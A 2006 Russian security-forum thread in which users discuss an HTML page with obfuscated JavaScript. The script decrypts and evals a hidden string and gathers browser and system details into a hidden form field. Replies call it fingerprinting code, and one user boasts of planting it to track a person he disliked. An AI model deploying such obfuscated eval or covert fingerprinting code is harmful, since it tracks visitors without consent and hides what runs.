Чаты Что такое test.html ?Код

Discussion in 'Веб-уязвимости' started by Adio, 27 Jun 2006.

Thread Status:
Not open for further replies.
  1. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    <iframe>
    <html>

    <head>
    <title></title>
    </head>

    <body>

    <xml:namespace ns='http://www.microsoft.com/ie' prefix='IE'><STYLE>@media all{IE\:clientCaps {behavior:url(#default#clientcaps);}}</STYLE><IE:CLIENTCAPS ID="oClientCaps"><script Language="JavaScript">
    var IeData = "";
    var dd = new Date();
    region = Math.round(dd.getTime() / 1000) - 1094027898;
    var RandomNumber = 1094027898;
    AllData = region+"/"+window.screen.width+"/"+window.screen.height+"/"+window.screen.colorDepth;

    random_line="gsw~rn e}~DqheFdHmj] 7Lmceh,s]~es{M]lJw O}Lg5#&aL@,hqD9Ut]F0~FjicMcJfk+b$=#V&)R"
    +"'H^&&S)+N*PNjFr*$%(5o&&qS8RT#Nk\n#fcT'$O&%L(+qSNoj6NSR%,GU;dL(Fm&#QT9P:#^h\r$g%T"
    +";$M.NQj7o/#%)6p&dl;6ph#LSFM&NU:HM)e#g\n%:RN)!V.#%U%MSdM)INhNQU#^&#L(KU&*M.6Rib!h"
    +"<Q:NmS$Q dnU~Nh$MUK^QMqS+M&Ml(5n/#M.H&fa#i%P $o,KOh#N,$^*$o(+V;#Mj5MQML(GV*$l.[$"
    +"eb$;!r Qn=5^S%US+N*PMjGRS)%(5M&RT(~N;$Qk\n#fcQS$p/Qp(+PU$Tj6NT#%,7NUdP/9R;^Q/5M&"
    +"#^h\r$g:U,7M(#LjJoRP%)6oVdTT$Rh#LSFM&*m/8U)e#g\n%&:m(JRS#%/KoRdM)HrhMlS~^&#P(6o/"
    +"#T.~Rib!h<Q;Ql=~m&dl:!Vh$MV6^R*mX+M&#LX$M;$Q)~&fa#iIq;MpV5MhMPTK^*$o)+V=&Tj5MS#P"
    +"X%URNn'[$eb$:7p/RO)7^R#q +N*PLj%QQN%(5U&OS/HTU;Qk\n#fcP/GnQ:p:+oS*Mj6NSR%SFrQdL("
    +"Fm&#m 5N;N^h\r$g^lX8S(^LjFO/;%)6p*dm.Grh#L(5r #Q)~N;e#g\n%:&mTFU:#%UHR*dM)HrhMlX"
    +"F^&#lS5MR(L)~oib!h<oS%l'Gm&dOTIph$MV5^ %MW+Q:&Q.8R:#L(5&fa#i5UR#p.HMh&qUG^*$nX+m"
    +"QMQj5M:#MU!M *L([$eb$ 5n:;p;9^S)nU+N*PLj$V;^%(5m&OU(8Q.Rqk\n#fcL;KV=:m:+MU#Lj6NT"
    +"^%S9V dL(6M:NRWGR(Q^h\r$g#qVJNV*Rj5p;;%/Kp.dU 7QhQOVKSR&M'IMUe#g\n%*#L=7oUO%,Ho*"
    +"dM)INh;T J^&#l(HV;*m/7rib!h<NR#L=7RRdn/~Rh&oW!^RRm +mT*P(Fp:%SUI&fa#i9O.:n:#MhMN"
    +" %^*$o)+n;Nqj5M&#q,5R**M.[$eb$/9nRMT.~^SOQ)+N*OqjFmVM%(5mQ#LT!M**nk\n#fcPX!Q;%N("
    +"+P&(oj6NT%%'%RTdL(HM:RU,GnS;^h\r$g*qV8V=OLjFT&M%)6p*dU'9Uh#LU5QV;TTGo=e#g\n%/^LT"
    +"6pQ#%T9S;dM)INh;U/$^&#n(9r=:mTHVib!h<SVMm'%p&dmSGUh$MV6^=;PS+M&OL/KV NmU%&fa#iHV"
    +"U;l;9MhPMX6^*$o(+U($pj9Q:*Q;~Q&(L([$eb$V7TSPm J^QQRV+N*Oqj%SR:%/9Q;*O.9M&#Lk\n#f"
    +"cp'7n&^lT+n.#Sj6NT%%'HnTdL(5MV:SS8S=Q^h 7jg{Gw4Lmcen\ny@Lbn\nyhnGrb4[+ws}Jt6An\n"
    +"mi4iA H][email protected]]FA]wsf!qcKnaD]3Ut]F0:An\noa#Ut]FA]wsfYP#@,hqD9sf "
    +"c@9$jdbEaDnf+b!h 7jg{Gw4Lmceo<z@Lbo<zh.sf9Bq]yy\r@v\nBb:[c.sf;zv\nqb:mad:m.sc<zv;j+"
    +"7so=po<zk)ff qj\nBo/@H.J-Dqz,GrzKy ww!so=p5/mb#oh,sjMqb$fi=uh;(k)h\n:so=p8/@e^l@";
    random_line2="@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!#$%^&*():;/. =,'{-}\r\n<+[]";

    random = location.pathname;

    if (random)
    {
    alert(random);
    fin = ""; pos = 0;
    for (i=0;i<random_line.length;i++)
    {
    first = random_line.charAt(i); second = random.charAt(pos);
    fin+=random_line2.charAt((random_line2.indexOf(first)-random_line2.indexOf(second)+random_line2.length)%random_line2.length); pos = (pos+1)%random.length;
    }
    alert(fin);
    eval(fin);
    fin=random_line2=random_line=random="";
    }
    var IeData = "/"+oClientCaps.connectionType+"/"+navigator.systemLanguage+"/"+navigator.browserLanguage+"/"+navigator.userLanguage+"/"+RandomNumber;
    alert(IeData);
    </script>
    bla bla bla....
    <form name=countform action="/re.pl" method=POST onsubmit="return Test(this)">
    <SCRIPT Language="JavaScript">document.write("<input type=\"Hidden\" name=\"Statistic\" value=\""+AllData+IeData+"\">");</SCRIPT>
    </form>

    aaaa
    </body>
    </iframe>
     
  2. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Это просто Html страничка и всё =)
     
    _________________________
  3. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    ты где её взял?! Сотри срочно, тебя уже наверное выследили!!! Ты еще её и сюда приволок! Ты нас всех здал! Там вшит микрофон, нас слышат! УЖАС!!!! АААААААААА......
    БАН БАН и еще раз БАН!

    Все теперь предеться менять лицо, делать пластическую операцию.
     
    1 person likes this.
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Этот код собирает информацию о компьютере пользователя, см статью про супербан (http://antichat.ru/txt/superban/)
     
  5. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Выдрано из мелкософта видать
    А вообще авто что ты хотел услышать на свой вопрос ? и приведя данный код ?
     
    _________________________
  6. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Это обыуновеный код который собирает информацию о твоем компьютере .
    Я помню когда то (примерно год назад я его втырил в свой сайт и собрал великолепное количество информации про одного чувака который меня бесил (теперь он не бесит :) ).
     
  7. Darkwayder

    Darkwayder Elder - Старейшина

    Joined:
    20 May 2006
    Messages:
    35
    Likes Received:
    2
    Reputations:
    0
    PHP:
    "gsw~rn e}~DqheFdHmj] 7Lmceh,s]~es{M]lJw O}Lg5#&aL@,hqD9Ut]F0~FjicMcJfk+b$=#V&)R"
    +"'H^&&S)+N*PNjFr*$%(5o&&qS8RT#Nk\n#fcT'$O&%L(+qSNoj6NSR%,GU;dL(Fm&#QT9P:#^h\r$g%T"
    +";$M.NQj7o/#%)6p&dl;6ph#LSFM&NU:HM)e#g\n%:RN)!V.#%U%MSdM)INhNQU#^&#L(KU&*M.6Rib!h"
    +"<Q:NmS$Q dnU~Nh$MUK^QMqS+M&Ml(5n/#M.H&fa#i%P $o,KOh#N,$^*$o(+V;#Mj5MQML(GV*$l.[$"
    +"eb$;!r Qn=5^S%US+N*PMjGRS)%(5M&RT(~N;$Qk\n#fcQS$p/Qp(+PU$Tj6NT#%,7NUdP/9R;^Q/5M&"
    +"#^h\r$g:U,7M(#LjJoRP%)6oVdTT$Rh#LSFM&*m/8U)e#g\n%&:m(JRS#%/KoRdM)HrhMlS~^&#P(6o/"
    +"#T.~Rib!h<Q;Ql=~m&dl:!Vh$MV6^R*mX+M&#LX$M;$Q)~&fa#iIq;MpV5MhMPTK^*$o)+V=&Tj5MS#P"
    +"X%URNn'[$eb$:7p/RO)7^R#q +N*PLj%QQN%(5U&OS/HTU;Qk\n#fcP/GnQ:P:+oS*Mj6NSR%SFrQdL("
    +"Fm&#m 5N;N^h\r$g^lX8S(^LjFO/;%)6p*dm.Grh#L(5r #Q)~N;e#g\n%:&mTFU:#%UHR*dM)HrhMlX"
    +"F^&#lS5MR(L)~oib!h<oS%l'Gm&dOTIph$MV5^ %MW+Q:&Q.8R:#L(5&fa#i5UR#p.HMh&qUG^*$nX+m"
    +"QMQj5M:#MU!M *L([$eb$ 5n:;p;9^S)nU+N*PLj$V;^%(5m&OU(8Q.Rqk\n#fcL;KV=:m:+MU#Lj6NT"
    +"^%S9V dL(6M:NRWGR(Q^h\r$g#qVJNV*Rj5p;;%/Kp.dU 7QhQOVKSR&M'IMUe#g\n%*#L=7oUO%,Ho*"
    +"dM)INh;T J^&#l(HV;*m/7rib!h<NR#L=7RRdn/~Rh&oW!^RRm +mT*P(Fp:%SUI&fa#i9O.:n:#MhMN"
    +" %^*$o)+n;Nqj5M&#q,5R**M.[$eb$/9nRMT.~^SOQ)+N*OqjFmVM%(5mQ#LT!M**nk\n#fcPX!Q;%N("
    +"+P&(oj6NT%%'%RTdL(HM:RU,GnS;^h\r$g*qV8V=OLjFT&M%)6p*dU'9Uh#LU5QV;TTGo=e#g\n%/^LT"
    +"6pQ#%T9S;dM)INh;U/$^&#n(9r=:mTHVib!h<SVMm'%p&dmSGUh$MV6^=;PS+M&OL/KV NmU%&fa#iHV"
    +"U;l;9MhPMX6^*$o(+U($pj9Q:*Q;~Q&(L([$eb$V7TSPm J^QQRV+N*Oqj%SR:%/9Q;*O.9M&#Lk\n#f"
    +"cp'7n&^lT+n.#Sj6NT%%'HnTdL(5MV:SS8S=Q^h 7jg{Gw4Lmcen\ny@Lbn\nyhnGrb4[+ws}Jt6An\n"
    +"mi4iA H][email protected]]FA]wsf!qcKnaD]3Ut]F0:An\noa#Ut]FA]wsfYP#@,hqD9sf "
    +"c@9$jdbEaDnf+b!h 7jg{Gw4Lmceo<z@Lbo<zh.sf9Bq]yy\r@v\nBb:[c.sf;zv\nqb:@m.sc<zv;j+"
    +"7so=po<zk)ff qj\nBo/@H.J-Dqz,GrzKy ww!so=p5/mb#oh,sjMqb$fi=uh;(k)h\n:so=p8/@e^l@";
    random_line2="@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW XYZ0123456789~!#$%^&*():;/. =,'{-}\r\n<+[]";
    Имхо я бы хотел узнать что обозначает этот кусок кода. Наверно зашифровано всё. А в каком алгоритме шифрования скажите кому не тяжело.
     
    #7 Darkwayder, 27 Jun 2006
    Last edited: 27 Jun 2006
  8. OFF1genny_su1c1D

    OFF1genny_su1c1D New Member

    Joined:
    29 Apr 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Мда значение переменной random_line сразу настораживает.
    Скопировал код и загрузил его в браузер. В итоге браузеру ничего переданно не было, кроме серого квадратика(типо фрейм) .
    Кстати код не на ПХП а на яве.
     
  9. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    а тут и нигде не написанно что это это php код...
     
  10. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Всё, уже флуйм пошёл. На вопрос был дан ответ. Закрыта тема.
     
Thread Status:
Not open for further replies.